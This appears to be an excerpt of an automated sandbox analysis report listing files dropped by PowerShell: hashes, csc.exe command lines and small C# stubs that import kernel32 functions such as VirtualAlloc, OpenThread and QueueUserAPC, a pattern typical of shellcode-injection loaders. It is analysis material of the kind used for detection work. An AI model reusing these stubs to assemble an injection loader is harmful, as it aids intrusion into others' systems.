                        C:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.0937098411846407
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryglcak7Ynqq7lxPN5Dlq5J:+RI+ycuZhNqlcakS7lxPNnqX
                        MD5:7BB8DBEA1D7CC9AE6DD3C9DDACDD5B05
                        SHA1:70F372DC7BEC4258A118B2994CF727706C637A6F
                        SHA-256:7E32817C8D9513A2384D66358662E876E51F86C98ED88DCEF8600E517D18EE4B
                        SHA-512:854DF89436FA8D435CFFA8AD3849731BDF6C1DC51ABCB702C67966E54952001EF34C86E6C44F4FB255A4B709C3E71DE9BBC99C82BDE9E997E39810C8F1B55B75
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.049516587690195
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                        MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                        SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                        SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                        SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                        C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.193724877080382
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fkosQoOUzxs7+AEszI923fkosQoM:p37Lvkmb6KzPxUWZE2PL
                        MD5:B5A546325FF70B405A6EDD0E5B93A5B0
                        SHA1:1E9346960956AE815C2BDA5EC359E6D535A870FE
                        SHA-256:D00CA81D76135390A9D1558CDE7562A4BE918C9DE9777A71881B6454A3ECE403
                        SHA-512:11A099697D3417B2E47DABAA93C85D5EE6B3096F48B44B1EE1B37A822EC78DC8B04AD599CFA641FAECB6FC951C9E0F5916A938BA84A09F026EEF36F00494BE6D
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs"
                        C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.6346506026861856
                        Encrypted:false
                        SSDEEP:24:etGSR8+mUE7R85z7woel/gXxp4/eiDPtkZf/mB5DZ0WI+ycuZhNqlcakS7lxPNnq:6nXE7S5gGBbiyJ/mBxZX1ulqaa37Bq
                        MD5:32F1B9D17FF5CE273F76E691A3957DA8
                        SHA1:3233B9F58DAA9DF48B43342EE29CC6AD6B8D4178
                        SHA-256:81BBAACB864F40359F08B4E22970E88F040D833B132CF5E48765A22CEE909384
                        SHA-512:D1B55F658650A21F57676944AE121C986A3FB3E6092FFACC61B59EDD5AFC7F695F6292C8AB281AF716B88DDAB7BCCAF2DC03D1BE27CEE8C992ABCC5904D87640
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                        C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):868
                        Entropy (8bit):5.308132284793118
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzPx1E2PKKaM5DqBVKVrdFAMBJTH:Akka6aPx1E2PKKxDcVKdBJj
                        MD5:7E8A8641A737C70C899C4179EDDFC967
                        SHA1:3D6B8AB11FC9BF77D4395D19B1F8555B94768BB2
                        SHA-256:542B3D61A71514E012405F6DA07489BEEAEC5F0454D4CB25967E2BABCC896873
                        SHA-512:681789A5B72DA601257B45D36839BC0D1F422AE4B440D2A467ECD19552A2A8E00D8D686EE3B835508026643F184F955F221A4EBFC86DD02BDC111C966CEEC55A
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.011724479977666
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                        MD5:B1DA1EF961AA0CE50C236459261D955A
                        SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                        SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                        SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                        C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.2527558218035555
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f6LKafLXzxs7+AEszI923f6LKafLSn:p37Lvkmb6KzSOafrWZE2SOafGn
                        MD5:0E1A4FB543233681B29500DF56AA6F57
                        SHA1:8184927FBC93A8FCE2FD8CDCEC13AC2F88FB8306
                        SHA-256:EADB21BF3DAE2990213DE43C3E98CBAA88F21623B1B6A918BEE662FEEFB42507
                        SHA-512:8B62C9B1DE30ABD20A4C74F4D9697A9E681275136986C384D12084DE41FB94DC7FB8C843E9AF851B0576CF89C26D7A127FC9B966BCDC953F89C0F9F956BAAAFC
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs"
                        C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):5.3183379397344765
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzSOafIE2SOafGuKaM5DqBVKVrdFAMBJTH:Akka6aSOeIE2SOeHKxDcVKdBJj
                        MD5:7241074EE55D01DA6C48E3A1DED01E88
                        SHA1:8221789569283A548A8860B38CE838E40150866B
                        SHA-256:FAF7AEF162FB9D7E43C8A189411C11D62BB1990731351E8520ED648937EE5A97
                        SHA-512:B7EF07709729A576FE4718BCA73B0CB499EBB5FEDF2323101207C6D4C5A9A41F64137EF3FA75F502B59CF391C85D65F5E70EB1AE0A46E787C83DC4A0268271BC
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.109921450738045
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grydThak7YnqqsTGPN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                        MD5:1DF567DCC97B0A7A089824364B677531
                        SHA1:F78BFB839164EEA3C6373359223DF1E347ABAAF3
                        SHA-256:E9775CAE51FE4CF3AE6BD9573077DBCB268034D0940A69E9E8020305F210E05E
                        SHA-512:EA75DC230C2B40003F3FB9ECBB6252FF72AFAC23751E0FA6C72C006A435CECCC93D70F245302BD2402B161D11FDE48F521138FDC6348DD7F8ECC8CEFAB23BC05
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.049516587690195
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                        MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                        SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                        SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                        SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.222902776745778
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fhQHgUzxs7+AEszI923fhQHs9:p37Lvkmb6Kz5QHDWZE25QHs9
                        MD5:06D22660044726226847AB9E405CDCA3
                        SHA1:0FB2A0C3CFCD8C7F2B1DDBB956ABDABBFA1CB06D
                        SHA-256:EE83EE6D67E2174D63373BE421E6411D81997D2C20B757074BED1C71EC273790
                        SHA-512:5A6F2E94B557B234CC1E12BF643048A3A797453ECF8885F6D44B8CD4B2415330C9C4A95E0CFEF4BEB30E5165CE630D4F0805195BD16BAE7FE6FA84374814475F
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs"
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.6349672358126073
                        Encrypted:false
                        SSDEEP:24:etGSD8+mUE7R85z7woel/gx4/eiDPtkZfZzwLDZ0WI+ycuZhNtakS7PNnq:6BXE7S5gGjiyJZzwZX1ulta3xq
                        MD5:90EE0F91FF3E5AC8250C42785D163FB7
                        SHA1:13276BD1000D8F797C73C9B4BCA08127868C1EC9
                        SHA-256:E7251525735F9C3302CDE3DBF5F1796096283241712C20F38F5C4F64EA73070D
                        SHA-512:921B418BE5E4FC2F4D49CBCE1B323721E125F50C832A8E5A66037C7EB41230D29113DA342EF0A050A0DD9423A3AE96562D67682CF84D06DF77001A879A5B6E49
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):868
                        Entropy (8bit):5.320077744261521
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzXE2V4KaM5DqBVKVrdFAMBJTH:Akka6aXE2V4KxDcVKdBJj
                        MD5:5D4927D1B228C0B04BE990A5CF5142D1
                        SHA1:BA0F046F862F9C11763D08A4CF8D3920EA250AD1
                        SHA-256:4C6B817FC7F440DE8C31AD988B1CCEA218531E2BCC2FDDBBF79F1AC6EA07E95E
                        SHA-512:94F287FF11ACB9E1772EF97E61C2B408DC85086F92DCBDECB69D6180F67EC2F3DCD7BAED33CCDB9E8F2CD507E458D07298962F8C62B481AEA9F39B293C0BDE9D
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.011724479977666
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                        MD5:B1DA1EF961AA0CE50C236459261D955A
                        SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                        SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                        SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                        C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.255365080899839
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fiVCWzxs7+AEszI923fiVCr:p37Lvkmb6KzKVCWWZE2KVCr
                        MD5:7C6E6D084FD264B37BCD7CC2BFAF1523
                        SHA1:197FBFFC51C699B27EB6EB0C914E044103B1503E
                        SHA-256:1EAA871B794C66E8F63C4EAC98E9110E562B64B2C81CE1F4B380ACF378EA0BB1
                        SHA-512:51B70D5DB9523935220EBD45501021056DEC17D6CFD1A016FF19060E8B5980E809F468D040F06ADBF8F013093301D2106286136F2F818153CC127E9AA3442277
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs"
                        C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):5.335054980168907
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzKwnE2KwqKaM5DqBVKVrdFAMBJTH:Akka6aPE2iKxDcVKdBJj
                        MD5:D25692BE4A7B9E0D1859FED2E0B81B64
                        SHA1:5686819FE68A92F329686AEDF4CDD3CC8DA92609
                        SHA-256:D1260E5FC02624D38E533E5DB33FC83912F8A907509D4C1809BAB069CDDB8912
                        SHA-512:3560116FF740032B6B93CA22BDB32481B7CDEFEAC20A1577F1B95FD465B04F5281AED4F4DFD25C3B5CABEF38073ED50421991A8D62B3E22E7B62FE47CD62CB5D
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.1139785671928237
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7Ynqq0PN5Dlq5J:+RI+ycuZhNoakS0PNnqX
                        MD5:74AC8729B044EF3E55CA0A024EFF165F
                        SHA1:CBFB0EA2703141E51FB43DA9F9288DA871566FB7
                        SHA-256:C9AF660105465928BE198DBDEB8D4BE5BA9D1B3048299AEB4CA1678D0E829480
                        SHA-512:E4B800C3568143FB841E0B86831C9ECFE1165EB81A17A885755C419CE4DA1E9CAEEA927893336E8F5F0EADACA2295DB5AA983F18D8E2E48A71846F4BFC87BFCA
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.049516587690195
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                        MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                        SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                        SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                        SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                        C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.28862302275331
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fPt10zxs7+AEszI923fPtdx:p37Lvkmb6KzMWZE2p
                        MD5:FEC723AE4CE1D4A72A48375DAE57F152
                        SHA1:7D0E0234A688710DE2AFE91CBDAA0F7EDC5449C4
                        SHA-256:AF7C1A6DBC10AA5EBB5D72297108D245410FB5FB55D48E3386E4799963732300
                        SHA-512:F018829EA6161344C82F9D46ADA4599BD8C86390DDA4048A59359DB7CC7DDCC052E55B8F893292408EE8D11F5C956A14B79279F119039E799C97D3B6EC77FA6C
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs"
                        C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.64310436733059
                        Encrypted:false
                        SSDEEP:24:etGSR8+mUE7R85z7woel/gYp94/eiDPtkZfEPFXmSDZ0WI+ycuZhNoakS0PNnq:6nXE7S5gGYpXiyJmFXm0ZX1uloa3Uq
                        MD5:E78B4F20C9C3ECDFAADE20B23787EBCB
                        SHA1:B89C1EC666680DA7AB129A0F5E9A593625D94201
                        SHA-256:0CF920EAE8AD9733EB1FEAE76CAE748499E334BD5AF3B8E6F0D1940810C3D7F2
